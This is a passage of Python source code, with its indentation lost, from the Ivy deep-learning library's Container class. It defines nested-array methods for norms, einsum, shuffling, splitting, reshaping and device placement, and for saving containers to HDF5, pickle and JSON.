:param max_norm: The max norm container or number to clip against.
:type max_norm: Ivy container or number
:param p: The p-value for computing the p-norm container or number.
:type p: Ivy container or number
:param global_norm: Whether to compute the norm across all the concattenated sub-arrays. Default is False.
:type global_norm: bool, optional
:param key_chains: The key-chains to apply or not apply the method to. Default is None.
:type key_chains: list or dict of strs, optional
:param to_apply: If True, the method will be applied to key_chains, otherwise key_chains will be skipped.
Default is True.
:type to_apply: bool, optional
:param prune_unapplied: Whether to prune key_chains for which the function was not applied. Default is False.
:type prune_unapplied: bool, optional
:return: Container object with all sub-arrays having the clipped norms returned.
"""
max_norm_is_container = isinstance(max_norm, Container)
p_is_container = isinstance(p, Container)
if global_norm:
if max_norm_is_container or p_is_container:
raise Exception(
'global_norm can only be computed for scalar max_norm and p_val arguments,'
'but found {} and {} of type {} and {} respectively'.format(
max_norm, p, type(max_norm), type(p)))
vector_norm = self.vector_norm(p, global_norm=True)
ratio = max_norm/vector_norm
if ratio < 1:
return self * ratio
return self.copy()
return self.map(lambda x, kc:
self._ivy.clip_vector_norm(
x, max_norm[kc] if max_norm_is_container else max_norm,
p[kc] if p_is_container else p) if self._ivy.is_array(x) else x,
key_chains, to_apply, prune_unapplied)
def einsum(self, equation, key_chains=None, to_apply=True, prune_unapplied=False):
"""
Sums the product of the elements of the input operands along dimensions specified using a notation based on the
Einstein summation convention, for each array in the container.
:param equation: A str describing the contraction, in the same format as numpy.einsum.
:type equation: str
:param key_chains: The key-chains to apply or not apply the method to. Default is None.
:type key_chains: list or dict of strs, optional
:param to_apply: If True, the method will be applied to key_chains, otherwise key_chains will be skipped.
Default is True.
:type to_apply: bool, optional
:param prune_unapplied: Whether to prune key_chains for which the function was not applied. Default is False.
:type prune_unapplied: bool, optional
:return: Container object with all sub-array dimensions expanded along the axis.
"""
return self.map(lambda x, kc: self._ivy.einsum(equation, x) if self._ivy.is_array(x) else x,
key_chains, to_apply, prune_unapplied)
def vector_norm(self, p=2, axis=None, keepdims=False, global_norm=False, key_chains=None, to_apply=True,
prune_unapplied=False):
"""
Compute vector p-norm for each array in the container.
:param p: Order of the norm. Default is 2.
:type p: int or str or container, optional
:param axis: If axis is an integer, it specifies the axis of x along which to compute the vector norms.
Default is None, in which case the flattened array is considered.
:type axis: int or sequence of ints, optional
:param keepdims: If this is set to True, the axes which are normed over are left in the result as dimensions
with size one. With this option the result will broadcast correctly against the original x.
Default is False.
:type keepdims: bool, optional
:param global_norm: Whether to compute the norm across all the concattenated sub-arrays. Default is False.
:type global_norm: bool, optional
:param key_chains: The key-chains to apply or not apply the method to. Default is None.
:type key_chains: list or dict of strs, optional
:param to_apply: If True, the method will be applied to key_chains, otherwise key_chains will be skipped.
Default is True.
:type to_apply: bool, optional
:param prune_unapplied: Whether to prune key_chains for which the function was not applied. Default is False.
:type prune_unapplied: bool, optional
:return: Container object with the vector norms for each sub-array returned.
"""
p_is_container = isinstance(p, Container)
if global_norm:
if p_is_container:
raise Exception(
'global_norm can only be computed for scalar p argument,'
'but found {} of type {}'.format(p, type(p)))
return sum([v for k, v in
self.map(lambda x, kc: self._ivy.reduce_sum(x ** p)).to_iterator()]) ** (1/p)
return self.map(lambda x, kc: self._ivy.vector_norm(x, p[kc] if p_is_container else p, axis, keepdims)
if self._ivy.is_array(x) else x, key_chains, to_apply, prune_unapplied)
def matrix_norm(self, p=2, axis=None, keepdims=False, key_chains=None, to_apply=True, prune_unapplied=False):
"""
Compute matrix p-norm for each array in the container.
:param p: Order of the norm. Default is 2.
:type p: int or str, optional
:param axis: If axis is an integer, it specifies the axis of x along which to compute the matrix norms.
Default is None, in which case the flattened array is considered.
:type axis: int or sequence of ints, optional
:param keepdims: If this is set to True, the axes which are normed over are left in the result as dimensions
with size one. With this option the result will broadcast correctly against the original x.
Default is False.
:type keepdims: bool, optional
:param key_chains: The key-chains to apply or not apply the method to. Default is None.
:type key_chains: list or dict of strs, optional
:param to_apply: If True, the method will be applied to key_chains, otherwise key_chains will be skipped.
Default is True.
:type to_apply: bool, optional
:param prune_unapplied: Whether to prune key_chains for which the function was not applied. Default is False.
:type prune_unapplied: bool, optional
:return: Container object with the matrix norms for each sub-array returned.
"""
return self.map(lambda x, kc: self._ivy.matrix_norm(x, p, axis, keepdims) if self._ivy.is_array(x) else x,
key_chains, to_apply, prune_unapplied)
def flip(self, axis=None, key_chains=None, to_apply=True, prune_unapplied=False):
"""
Reverses the order of elements in for each array in the container, along the given axis.
The shape of the array is preserved, but the elements are reordered.
:param axis: Axis or axes along which to flip over. The default, axis=None, will flip over all axes.
:type axis: None or int or sequence of ints, optional
:param key_chains: The key-chains to apply or not apply the method to. Default is None.
:type key_chains: list or dict of strs, optional
:param to_apply: If True, the method will be applied to key_chains, otherwise key_chains will be skipped.
Default is True.
:type to_apply: bool, optional
:param prune_unapplied: Whether to prune key_chains for which the function was not applied. Default is False.
:type prune_unapplied: bool, optional
:return: Container object with all sub-array dimensions expanded along the axis.
"""
return self.map(lambda x, kc: self._ivy.flip(x, axis) if self._ivy.is_array(x) else x,
key_chains, to_apply, prune_unapplied)
def shuffle(self, seed_value=None, key_chains=None, to_apply=True, prune_unapplied=False, key_chain=''):
"""
Shuffle entries in all sub-arrays, such that they are still aligned along axis 0.
:param seed_value: random seed to use for array shuffling
:type seed_value: int
:param key_chains: The key-chains to apply or not apply the method to. Default is None.
:type key_chains: list or dict of strs, optional
:param to_apply: If True, the method will be applied to key_chains, otherwise key_chains will be skipped.
Default is True.
:type to_apply: bool, optional
:param prune_unapplied: Whether to prune key_chains for which the function was not applied. Default is False.
:type prune_unapplied: bool, optional
:param key_chain: Chain of keys for this dict entry
:type key_chain: str
"""
return_dict = dict()
if seed_value is None:
seed_value = self._ivy.to_numpy(self._ivy.random.randint(0, 1000, ())).item()
for key, value in sorted(self.items()):
this_key_chain = key if key_chain == '' else (key_chain + '/' + key)
if isinstance(value, Container):
ret = value.shuffle(seed_value, key_chains, to_apply, prune_unapplied, this_key_chain)
if ret:
return_dict[key] = ret
else:
if key_chains is not None:
if (this_key_chain in key_chains and not to_apply) or (
this_key_chain not in key_chains and to_apply):
if prune_unapplied:
continue
return_dict[key] = value
continue
self._ivy.seed(seed_value)
return_dict[key] = self._ivy.shuffle(value)
return Container(return_dict, **self._config)
def slice_via_key(self, slice_key):
"""
Get slice of container, based on key.
:param slice_key: key to slice container at.
:type slice_key: str
:return: Container object sliced at desired key.
"""
return_dict = dict()
for key, value in sorted(self.items()):
if key == slice_key:
return value
elif isinstance(value, Container):
return_dict[key] = value.slice_via_key(slice_key)
else:
return_dict[key] = value
return Container(return_dict, **self._config)
def as_ones(self, key_chains=None, to_apply=True, prune_unapplied=False):
"""
Return arrays of ones for all nested arrays in the container.
:param key_chains: The key-chains to apply or not apply the method to. Default is None.
:type key_chains: list or dict of strs, optional
:param to_apply: If True, the method will be applied to key_chains, otherwise key_chains will be skipped.
Default is True.
:type to_apply: bool, optional
:param prune_unapplied: Whether to prune key_chains for which the function was not applied. Default is False.
:type prune_unapplied: bool, optional
:return: Container object with all sub-arrays filled with ones.
"""
return self.map(lambda x, kc: self._ivy.ones_like(x) if self._ivy.is_array(x) else x, key_chains, to_apply,
prune_unapplied)
def as_zeros(self, key_chains=None, to_apply=True, prune_unapplied=False):
"""
Return arrays of zeros for all nested arrays in the container.
:param key_chains: The key-chains to apply or not apply the method to. Default is None.
:type key_chains: list or dict of strs, optional
:param to_apply: If True, the method will be applied to key_chains, otherwise key_chains will be skipped.
Default is True.
:type to_apply: bool, optional
:param prune_unapplied: Whether to prune key_chains for which the function was not applied. Default is False.
:type prune_unapplied: bool, optional
:return: Container object with all sub-arrays filled with zeros.
"""
return self.map(lambda x, kc: self._ivy.zeros_like(x) if self._ivy.is_array(x) else x, key_chains, to_apply,
prune_unapplied)
def as_bools(self, assert_is_bool=False, key_chains=None, to_apply=True, prune_unapplied=False):
"""
Return boolean evaluation for all nested items in the container.
:param assert_is_bool: Whether or not to assert the entry is of type Boolean.
:type assert_is_bool: bool, optional
:param key_chains: The key-chains to apply or not apply the method to. Default is None.
:type key_chains: list or dict of strs, optional
:param to_apply: If True, the method will be applied to key_chains, otherwise key_chains will be skipped.
Default is True.
:type to_apply: bool, optional
:param prune_unapplied: Whether to prune key_chains for which the function was not applied. Default is False.
:type prune_unapplied: bool, optional
:return: Container object with all entries boolean evaluated.
"""
def _ret_bool(x):
if assert_is_bool:
assert isinstance(x, bool)
return x
return bool(x)
return self.map(lambda x, kc: _ret_bool(x), key_chains, to_apply, prune_unapplied)
def as_random_uniform(self, low=0.0, high=1.0, key_chains=None, to_apply=True, prune_unapplied=False):
"""
Return arrays of random uniform values for all nested arrays in the container.
:param low: Lower boundary of the output interval. All values generated will be greater than or equal to low.
The default value is 0.
:type low: float
:param high: Upper boundary of the output interval. All values generated will be less than high.
The default value is 1.0.
:type high: float
:param key_chains: The key-chains to apply or not apply the method to. Default is None.
:type key_chains: list or dict of strs, optional
:param to_apply: If True, the method will be applied to key_chains, otherwise key_chains will be skipped.
Default is True.
:type to_apply: bool, optional
:param prune_unapplied: Whether to prune key_chains for which the function was not applied. Default is False.
:type prune_unapplied: bool, optional
:return: Container object with all sub-arrays filled with random uniform values.
"""
return self.map(lambda x, kc: self._ivy.random_uniform(
low, high, x.shape, self._ivy.dev_str(x)) if self._ivy.is_array(x) else x,
key_chains, to_apply, prune_unapplied)
def to_native(self, nested=False, key_chains=None, to_apply=True, prune_unapplied=False):
"""
Return native framework arrays for all nested arrays in the container.
:param nested: Whether to apply the conversion on arguments in a nested manner. If so, all dicts, lists and
tuples will be traversed to their lowest leaves in search of ivy.Array and ivy.Variable
instances. Default is False.
:type nested: bool, optional
:param key_chains: The key-chains to apply or not apply the method to. Default is None.
:type key_chains: list or dict of strs, optional
:param to_apply: If True, the method will be applied to key_chains, otherwise key_chains will be skipped.
Default is True.
:type to_apply: bool, optional
:param prune_unapplied: Whether to prune key_chains for which the function was not applied. Default is False.
:type prune_unapplied: bool, optional
:return: Container object with all sub-arrays converted to their native format.
"""
return self.map(lambda x, kc: self._ivy.to_native(x, nested=nested), key_chains, to_apply, prune_unapplied)
def to_ivy(self, nested=False, key_chains=None, to_apply=True, prune_unapplied=False):
"""
Return ivy arrays for all nested native framework arrays in the container.
:param nested: Whether to apply the conversion on arguments in a nested manner. If so, all dicts, lists and
tuples will be traversed to their lowest leaves in search of ivy.Array and ivy.Variable
instances. Default is False.
:type nested: bool, optional
:param key_chains: The key-chains to apply or not apply the method to. Default is None.
:type key_chains: list or dict of strs, optional
:param to_apply: If True, the method will be applied to key_chains, otherwise key_chains will be skipped.
Default is True.
:type to_apply: bool, optional
:param prune_unapplied: Whether to prune key_chains for which the function was not applied. Default is False.
:type prune_unapplied: bool, optional
:return: Container object with all native sub-arrays converted to their ivy.Array instances.
"""
return self.map(lambda x, kc: self._ivy.to_ivy(x, nested=nested), key_chains, to_apply, prune_unapplied)
def expand_dims(self, axis, key_chains=None, to_apply=True, prune_unapplied=False):
"""
Expand dims of all sub-arrays of container object.
:param axis: Axis along which to expand dimensions of the sub-arrays.
:type axis: int
:param key_chains: The key-chains to apply or not apply the method to. Default is None.
:type key_chains: list or dict of strs, optional
:param to_apply: If True, the method will be applied to key_chains, otherwise key_chains will be skipped.
Default is True.
:type to_apply: bool, optional
:param prune_unapplied: Whether to prune key_chains for which the function was not applied. Default is False.
:type prune_unapplied: bool, optional
:return: Container object with all sub-array dimensions expanded along the axis.
"""
return self.map(lambda x, kc: self._ivy.expand_dims(x, axis) if self._ivy.is_array(x) else x,
key_chains, to_apply, prune_unapplied)
def dev_clone(self, dev_strs):
"""
Clone the current container across multiple devices.
:param dev_strs: The devices on which to clone the container.
:type dev_strs: sequence of str
:return: a set of cloned containers across the specified devices.
"""
return self._ivy.DevClonedItem({dev_str: self.to_dev(dev_str) for dev_str in dev_strs})
def dev_dist(self, dev_strs: Union[Iterable[str], Dict[str, int]], axis=0):
"""
Distribute the current container across multiple devices.
:param dev_strs: The devices along which to distribute the container.
:type dev_strs: sequence of strs or dict of split sizes
:param axis: The axis along which to split the arrays at the container leaves. Default is 0.
:type axis: int, optional
:return: a set of distributed sub-containers across the specified devices.
"""
split_arg = list(dev_strs.values()) if isinstance(dev_strs, dict) else len(dev_strs)
return self._ivy.DevDistItem(
{dev_str: cont.to_dev(dev_str) for cont, dev_str in
zip(self.split(split_arg, axis, with_remainder=True), dev_strs)})
def to_multi_dev(self, dev_strs, axis=0):
"""
Return a single MultiDevContainer, which shares the same structure as the current container, but replaces arrays
at the leaves with DistributedArray instances.
:param dev_strs: The devices along which to distribute each array in the container.
:type dev_strs: sequence of str
:param axis: The axis along which to split the arrays at the container leaves. Default is 0.
:type axis: int, optional
:return: a MultiDevContainer instance, with all leafs arrays replaced by DistributedArray instances.
"""
return MultiDevContainer(
self.map(lambda x, kc: self._ivy.dev_dist_array(x, dev_strs, axis)), dev_strs, **self._config)
def unstack(self, axis, keepdims=False, dim_size=None):
"""
Unstack containers along specified dimension.
:param axis: Dimensions along which to unstack.
:type axis: int
:param keepdims: Whether to keep dimension 1 in the unstack dimensions. Default is False.
:type keepdims: bool, optional
:param dim_size: Size of the dimension to unstack. Determined from inputs by default.
:type dim_size: int, optional
:return: List of containers, unstacked along the specified dimension.
"""
if dim_size is None:
dim_size = self.shape[axis]
if keepdims:
# noinspection PyTypeChecker
return [self[slice(i, i+1, 1) if axis == 0
else tuple([slice(None, None, None)] * axis + [slice(i, i+1, 1)])] for i in range(dim_size)]
# noinspection PyTypeChecker
return [self[i if axis == 0 else tuple([slice(None, None, None)] * axis + [i])] for i in range(dim_size)]
def split(self, num_or_size_splits=None, axis=0, with_remainder=False, key_chains=None, to_apply=True,
prune_unapplied=False):
"""
Splits a container into multiple sub-containers, by splitting their constituent arrays.
:param num_or_size_splits: Number of equal arrays to divide the array into along the given axis if an integer.
The size of each split element if a sequence of integers.
Default is to divide into as many 1-dimensional arrays as the axis dimension.
:type num_or_size_splits: int, optional
:param axis: The axis along which to split, default is 0.
:type axis: int, optional
:param with_remainder: If the tensor does not split evenly, then store the last remainder entry.
Default is False.
:type with_remainder: bool, optional
:param key_chains: The key-chains to apply or not apply the method to. Default is None.
:type key_chains: list or dict of strs, optional
:param to_apply: If True, the method will be applied to key_chains, otherwise key_chains will be skipped.
Default is True.
:type to_apply: bool, optional
:param prune_unapplied: Whether to prune key_chains for which the function was not applied. Default is False.
:type prune_unapplied: bool, optional
:return: A list of sub-arrays.
"""
# ToDo: make this more efficient, without so many recursive container calls. For example the splits indices
# can be calculated here, and then slices applied directly only once
dim_size = num_or_size_splits if isinstance(num_or_size_splits, int) else len(num_or_size_splits)
# noinspection PyTypeChecker
return self.map(
lambda x, kc: self._ivy.split(x, num_or_size_splits, axis, with_remainder) if self._ivy.is_array(x)
else x, key_chains, to_apply, prune_unapplied).unstack(0, dim_size=dim_size)
def gather(self, indices, axis=-1, key_chains=None, to_apply=True, prune_unapplied=False):
"""
Gather slices from all container params at axis according to indices.
:param indices: Index array.
:type indices: array
:param axis: The axis from which to gather from. Default is -1.
:type axis: int, optional
:param key_chains: The key-chains to apply or not apply the method to. Default is None.
:type key_chains: list or dict of strs, optional
:param to_apply: If True, the method will be applied to key_chains, otherwise key_chains will be skipped.
Default is True.
:type to_apply: bool, optional
:param prune_unapplied: Whether to prune key_chains for which the function was not applied. Default is False.
:type prune_unapplied: bool, optional
:return: Container object with all sub-array dimensions gathered along the axis.
"""
return self.map(lambda x, kc: self._ivy.gather(x, indices, axis) if self._ivy.is_array(x) else x,
key_chains, to_apply, prune_unapplied)
def gather_nd(self, indices, key_chains=None, to_apply=True, prune_unapplied=False):
"""
Gather slices from all container params into a arrays with shape specified by indices.
:param indices: Index array.
:type indices: array
:param key_chains: The key-chains to apply or not apply the method to. Default is None.
:type key_chains: list or dict of strs, optional
:param to_apply: If True, the method will be applied to key_chains, otherwise key_chains will be skipped.
Default is True.
:type to_apply: bool, optional
:param prune_unapplied: Whether to prune key_chains for which the function was not applied. Default is False.
:type prune_unapplied: bool, optional
:return: Container object with all sub-array dimensions gathered.
"""
return self.map(lambda x, kc: self._ivy.gather_nd(x, indices) if self._ivy.is_array(x) else x,
key_chains, to_apply, prune_unapplied)
def repeat(self, repeats, axis=None, key_chains=None, to_apply=True, prune_unapplied=False):
"""
Repeat values along a given dimension for each array in the container.
:param repeats: Number of repetitions for each element. repeats is broadcast to fit the shape of the given axis.
:type repeats: int or sequence of ints.
:param axis: The axis along which to repeat values.
By default, use the flattened input array, and return a flat output array.
:type axis: int, optional
:param key_chains: The key-chains to apply or not apply the method to. Default is None.
:type key_chains: list or dict of strs, optional
:param to_apply: If True, the method will be applied to key_chains, otherwise key_chains will be skipped.
Default is True.
:type to_apply: bool, optional
:param prune_unapplied: Whether to prune key_chains for which the function was not applied. Default is False.
:type prune_unapplied: bool, optional
:return: container with each array being repeated along the specified dimension.
"""
return self.map(lambda x, kc: self._ivy.repeat(x, repeats, axis) if self._ivy.is_array(x) else x,
key_chains, to_apply, prune_unapplied)
def swapaxes(self, axis0, axis1, key_chains=None, to_apply=True, prune_unapplied=False):
"""
Interchange two axes for each array in the container.
:param axis0: First axis to be swapped.
:type axis0: int
:param axis1: Second axis to be swapped.
:type axis1: int
:param key_chains: The key-chains to apply or not apply the method to. Default is None.
:type key_chains: list or dict of strs, optional
:param to_apply: If True, the method will be applied to key_chains, otherwise key_chains will be skipped.
Default is True.
:type to_apply: bool, optional
:param prune_unapplied: Whether to prune key_chains for which the function was not applied. Default is False.
:type prune_unapplied: bool, optional
:return: ivy.Container with each chosen array having the axes swapped.
"""
return self.map(lambda x, kc: self._ivy.swapaxes(x, axis0, axis1) if self._ivy.is_array(x) else x,
key_chains, to_apply, prune_unapplied)
def reshape(self, pre_shape=None, shape_slice=None, post_shape=None, key_chains=None, to_apply=True,
prune_unapplied=False):
"""
Reshapes each array x in the container, to a new shape given by pre_shape + x.shape[shape_slice] + post_shape.
If shape_slice or post_shape are not specified, then the term is ignored.
:param pre_shape: The first elements in the new array shape.
:type pre_shape: int or sequence of ints, optional
:param shape_slice: The slice of the original shape to use in the new shape. Default is None.
:type shape_slice: int or sequence of ints, optional
:param post_shape: The final elements in the new array shape. Default is None.
:type post_shape: sequence of ints, optional
:param key_chains: The key-chains to apply or not apply the method to. Default is None.
:type key_chains: list or dict of strs, optional
:param to_apply: If True, the method will be applied to key_chains, otherwise key_chains will be skipped.
Default is True.
:type to_apply: bool, optional
:param prune_unapplied: Whether to prune key_chains for which the function was not applied. Default is False.
:type prune_unapplied: bool, optional
:return: ivy.Container with each array reshaped as specified.
"""
pre_shape = [] if pre_shape is None else\
([pre_shape] if isinstance(pre_shape, int) else list(pre_shape))
post_shape = [] if post_shape is None else\
([post_shape] if isinstance(post_shape, int) else list(post_shape))
if shape_slice is None:
return self.map(lambda x, kc: self._ivy.reshape(x, pre_shape + post_shape) if self._ivy.is_array(x) else x,
key_chains, to_apply, prune_unapplied)
shape_slice = slice(shape_slice, shape_slice+1) if isinstance(shape_slice, int) else shape_slice
return self.map(lambda x, kc:
self._ivy.reshape(x, pre_shape + list(x.shape[shape_slice]) + post_shape)
if self._ivy.is_array(x) else x, key_chains, to_apply, prune_unapplied)
def einops_rearrange(self, pattern, key_chains=None, to_apply=True, prune_unapplied=False, **axes_lengths):
"""
Perform einops rearrange operation on each sub array in the container.
:param pattern: Rearrangement pattern.
:type pattern: str
:param key_chains: The key-chains to apply or not apply the method to. Default is None.
:type key_chains: list or dict of strs, optional
:param to_apply: If True, the method will be applied to key_chains, otherwise key_chains will be skipped.
Default is True.
:type to_apply: bool, optional
:param prune_unapplied: Whether to prune key_chains for which the function was not applied. Default is False.
:type prune_unapplied: bool, optional
:param axes_lengths: Any additional specifications for dimensions.
:type axes_lengths: keyword parameter args
:return: ivy.Container with each array having einops.rearrange applied.
"""
return self.map(lambda x, kc: _ivy.einops_rearrange(x, pattern, **axes_lengths) if self._ivy.is_array(x) else x,
key_chains, to_apply, prune_unapplied)
def einops_reduce(self, pattern, reduction, key_chains=None, to_apply=True, prune_unapplied=False, **axes_lengths):
"""
Perform einops reduce operation on each sub array in the container.
:param pattern: Reduction pattern.
:type pattern: str
:param reduction: One of available reductions ('min', 'max', 'sum', 'mean', 'prod'), or callable.
:type reduction: str or callable
:param key_chains: The key-chains to apply or not apply the method to. Default is None.
:type key_chains: list or dict of strs, optional
:param to_apply: If True, the method will be applied to key_chains, otherwise key_chains will be skipped.
Default is True.
:type to_apply: bool, optional
:param prune_unapplied: Whether to prune key_chains for which the function was not applied. Default is False.
:type prune_unapplied: bool, optional
:param axes_lengths: Any additional specifications for dimensions.
:type axes_lengths: keyword parameter args
:return: ivy.Container with each array having einops.reduce applied.
"""
return self.map(lambda x, kc: _ivy.einops_reduce(x, pattern, reduction, **axes_lengths) if self._ivy.is_array(x)
else x, key_chains, to_apply, prune_unapplied)
def einops_repeat(self, pattern, key_chains=None, to_apply=True, prune_unapplied=False, **axes_lengths):
"""
Perform einops repeat operation on each sub array in the container.
:param pattern: Rearrangement pattern.
:type pattern: str
:param key_chains: The key-chains to apply or not apply the method to. Default is None.
:type key_chains: list or dict of strs, optional
:param to_apply: If True, the method will be applied to key_chains, otherwise key_chains will be skipped.
Default is True.
:type to_apply: bool, optional
:param prune_unapplied: Whether to prune key_chains for which the function was not applied. Default is False.
:type prune_unapplied: bool, optional
:param axes_lengths: Any additional specifications for dimensions.
:type axes_lengths: keyword parameter args
:return: ivy.Container with each array having einops.repeat applied.
"""
return self.map(lambda x, kc: _ivy.einops_repeat(x, pattern, **axes_lengths) if self._ivy.is_array(x) else x,
key_chains, to_apply, prune_unapplied)
def to_dev(self, dev_str, key_chains=None, to_apply=True, prune_unapplied=False):
"""
Move the container arrays to the desired device, specified by device string.
:param dev_str: device to move the array to 'cuda:0', 'cuda:1', 'cpu' etc. Keep same device if None.
:type dev_str: str, optional
:param key_chains: The key-chains to apply or not apply the method to. Default is None.
:type key_chains: list or dict of strs, optional
:param to_apply: If True, the method will be applied to key_chains, otherwise key_chains will be skipped.
Default is True.
:type to_apply: bool, optional
:param prune_unapplied: Whether to prune key_chains for which the function was not applied. Default is False.
:type prune_unapplied: bool, optional
:return: The container, but with each sub-array now placed on the target device.
"""
return self.map(lambda x, kc: self._ivy.stop_gradient(self._ivy.to_dev(x, dev_str))
if self._ivy.is_array(x) else x, key_chains, to_apply, prune_unapplied)
def stop_gradients(self, preserve_type=True, key_chains=None, to_apply=True, prune_unapplied=False):
"""
Stop gradients of all array entries in the container.
:param preserve_type: Whether to preserve the input type (ivy.Variable or ivy.Array),
otherwise an array is always returned. Default is True.
:param preserve_type: bool, optional
:param key_chains: The key-chains to apply or not apply the method to. Default is None.
:type key_chains: list or dict of strs, optional
:param to_apply: If True, the method will be applied to key_chains, otherwise key_chains will be skipped.
Default is True.
:type to_apply: bool, optional
:param prune_unapplied: Whether to prune key_chains for which the function was not applied. Default is False.
:type prune_unapplied: bool, optional
:return: container with each array having their gradients stopped.
"""
return self.map(
lambda x, kc: self._ivy.stop_gradient(x, preserve_type) if self._ivy.is_variable(x)
else x, key_chains, to_apply, prune_unapplied)
def as_variables(self, key_chains=None, to_apply=True, prune_unapplied=False):
"""
Converts all nested arrays to variables, which support gradient computation.
:param key_chains: The key-chains to apply or not apply the method to. Default is None.
:type key_chains: list or dict of strs, optional
:param to_apply: If True, the method will be applied to key_chains, otherwise key_chains will be skipped.
Default is True.
:type to_apply: bool, optional
:param prune_unapplied: Whether to prune key_chains for which the function was not applied. Default is False.
:type prune_unapplied: bool, optional
:return: container with each array converted to a variable.
"""
return self.map(lambda x, kc: self._ivy.variable(x) if self._ivy.is_array(x) else x,
key_chains, to_apply, prune_unapplied)
def as_arrays(self, key_chains=None, to_apply=True, prune_unapplied=False):
"""
Converts all nested variables to arrays, which do not support gradient computation.
:param key_chains: The key-chains to apply or not apply the method to. Default is None.
:type key_chains: list or dict of strs, optional
:param to_apply: If True, the method will be applied to key_chains, otherwise key_chains will be skipped.
Default is True.
:type to_apply: bool, optional
:param prune_unapplied: Whether to prune key_chains for which the function was not applied. Default is False.
:type prune_unapplied: bool, optional
:return: container with each variable converted to an array.
"""
return self.map(
lambda x, kc: self._ivy.stop_gradient(x, False) if self._ivy.is_variable(x)
else (x if self._ivy.is_array(x) else self._ivy.array(x)), key_chains, to_apply, prune_unapplied)
def to_numpy(self, key_chains=None, to_apply=True, prune_unapplied=False):
"""
Converts all nested ivy arrays to numpy arrays.
:param key_chains: The key-chains to apply or not apply the method to. Default is None.
:type key_chains: list or dict of strs, optional
:param to_apply: If True, the method will be applied to key_chains, otherwise key_chains will be skipped.
Default is True.
:type to_apply: bool, optional
:param prune_unapplied: Whether to prune key_chains for which the function was not applied. Default is False.
:type prune_unapplied: bool, optional
:return: container with each ivy array converted to a numpy array.
"""
return self.map(
lambda x, kc: self._ivy.to_numpy(x) if self._ivy.is_array(x) else x, key_chains, to_apply, prune_unapplied)
def arrays_as_lists(self, key_chains=None, to_apply=True, prune_unapplied=False):
"""
Converts all nested arrays to lists, a useful intermediate step for conversion to other framework array types.
:param key_chains: The key-chains to apply or not apply the method to. Default is None.
:type key_chains: list or dict of strs, optional
:param to_apply: If True, the method will be applied to key_chains, otherwise key_chains will be skipped.
Default is True.
:type to_apply: bool, optional
:param prune_unapplied: Whether to prune key_chains for which the function was not applied. Default is False.
:type prune_unapplied: bool, optional
:return: container with each array converted to a list.
"""
return self.map(
lambda x, kc: self._ivy.to_list(x) if self._ivy.is_array(x) else x, key_chains, to_apply, prune_unapplied)
def to_disk_as_hdf5(self, h5_obj_or_filepath, starting_index=0, mode='a', max_batch_size=None):
"""
Save container object to disk, as an h5py file, at the specified filepath.
:param h5_obj_or_filepath: Filepath for where to save the container to disk, or h5 object.
:type h5_obj_or_filepath: str or h5 object
:param starting_index: Batch index for which to start writing to file, if it already exists
:type starting_index: int
:param mode: H5 read/write mode for writing to disk, ['r', 'r+', 'w', 'w-', 'a'], default is 'a'.
:type mode: str
:param max_batch_size: Maximum batch size for the container on disk, this is useful if later appending to file.
:type max_batch_size: int
:type h5_obj_or_filepath: str or h5 object
"""
if type(h5_obj_or_filepath) is str:
h5_obj = _h5py.File(h5_obj_or_filepath, mode)
else:
h5_obj = h5_obj_or_filepath
for key, value in sorted(self.items()):
if isinstance(value, Container):
if key not in h5_obj.keys():
h5_group = h5_obj.create_group(key)
else:
h5_group = h5_obj[key]
value.to_disk_as_hdf5(h5_group, starting_index, mode, max_batch_size)
else:
value_as_np = self._ivy.to_numpy(value)
value_shape = value_as_np.shape
this_batch_size = value_shape[0]
if not max_batch_size:
max_batch_size = starting_index + this_batch_size
if key not in h5_obj.keys():
dataset_shape = [max_batch_size] + list(value_shape[1:])
maxshape = ([None for _ in dataset_shape])
h5_obj.create_dataset(key, dataset_shape, dtype=value_as_np.dtype, maxshape=maxshape)
space_left = max_batch_size - starting_index
amount_to_write = min(this_batch_size, space_left)
h5_obj[key][starting_index:starting_index + amount_to_write] = value_as_np[0:amount_to_write]
def to_disk_as_pickled(self, pickle_filepath):
"""
Save container object to disk, as an pickled file, at the specified filepath.
:param pickle_filepath: Filepath for where to save the container to disk.
:type pickle_filepath: str
"""
if _ivy.wrapped_mode():
_pickle.dump(self.to_native().to_dict(), open(pickle_filepath, 'wb'))
else:
_pickle.dump(self.to_dict(), open(pickle_filepath, 'wb'))
def to_jsonable(self, return_dict=None):
"""
Return container with non-jsonable elements converted to string representations, which are jsonable.
"""
if return_dict is None:
return_dict = self.copy()
for k, v in return_dict.items():
if not _is_jsonable(v):
if isinstance(v, dict):
return_dict[k] = self.to_jsonable(v)
else:
return_dict[k] = str(v)
return return_dict
def to_disk_as_json(self, json_filepath):
"""
Save container object to disk, as an json file, at the specified filepath.
:param json_filepath: Filepath for where to save the container to disk.
:type json_filepath: str
"""
with open(json_filepath, 'w+') as json_data_file:
_json.dump(self.to_jsonable().to_dict(), json_data_file, indent=4)
def to_list(self):
"""
Return nested list representation of container object.
:return: Container as nested list.
"""
return_list = list()
for key, value in sorted(self.items()):
if isinstance(value, Container):
return_list.append(value.to_list())
elif value is not None and key != '_f':
return_list.append(value)
return return_list
def to_raw(self):
"""
Return nested raw representation of container object. This includes restoring lists and tuples passed in the
constructor to their original form.
:return: Container data in it's raw form.
"""
return_item = dict()
for i, (key, value) in enumerate(sorted(self.items())):
if isinstance(value, Container):
return_item[key] = value.to_raw()
elif key[0:3] == 'it_' and tuple(self._types_to_iteratively_nest):
return_item = list([v.to_raw() if isinstance(v, Container) else v for v in self.values()])
break
else:
return_item[key] = value
return return_item
def to_dict(self):
"""
Return nested pure dict representation of container object.
:return: Container as nested dict.
"""
return_dict = dict()
for key, value in sorted(self.items()):
if isinstance(value, Container):
return_dict[key] = value.to_dict()
else:
return_dict[key] = value
return return_dict
def to_iterator(self, key_chain='', leaf_keys_only=False):
"""
Return iterator for traversing through the nested elements of container object.
:return: Iterator for the container elements.
"""
for key, value in sorted(self.items()):
if leaf_keys_only:
kc = key
else:
kc = key_chain + '/' + key if key_chain != '' else key
if isinstance(value, Container):
# noinspection PyCompatibility
yield from value.to_iterator(kc, leaf_keys_only)
else:
yield kc, value
def to_iterator_values(self):
"""
Return iterator for traversing through the nested values of container object.
:return: Iterator for the container values.
"""
for key, value in sorted(self.items()):
if isinstance(value, Container):
# noinspection PyCompatibility
yield from value.to_iterator_values()
else:
yield value
def to_iterator_keys(self, key_chain='', leaf_keys_only=False):
"""
Return iterator for traversing through the nested keys of container object.
:return: Iterator for the container elements.
"""
for key, value in sorted(self.items()):
if leaf_keys_only:
kc = key
else:
kc = key_chain + '/' + key if key_chain != '' else key
if isinstance(value, Container):
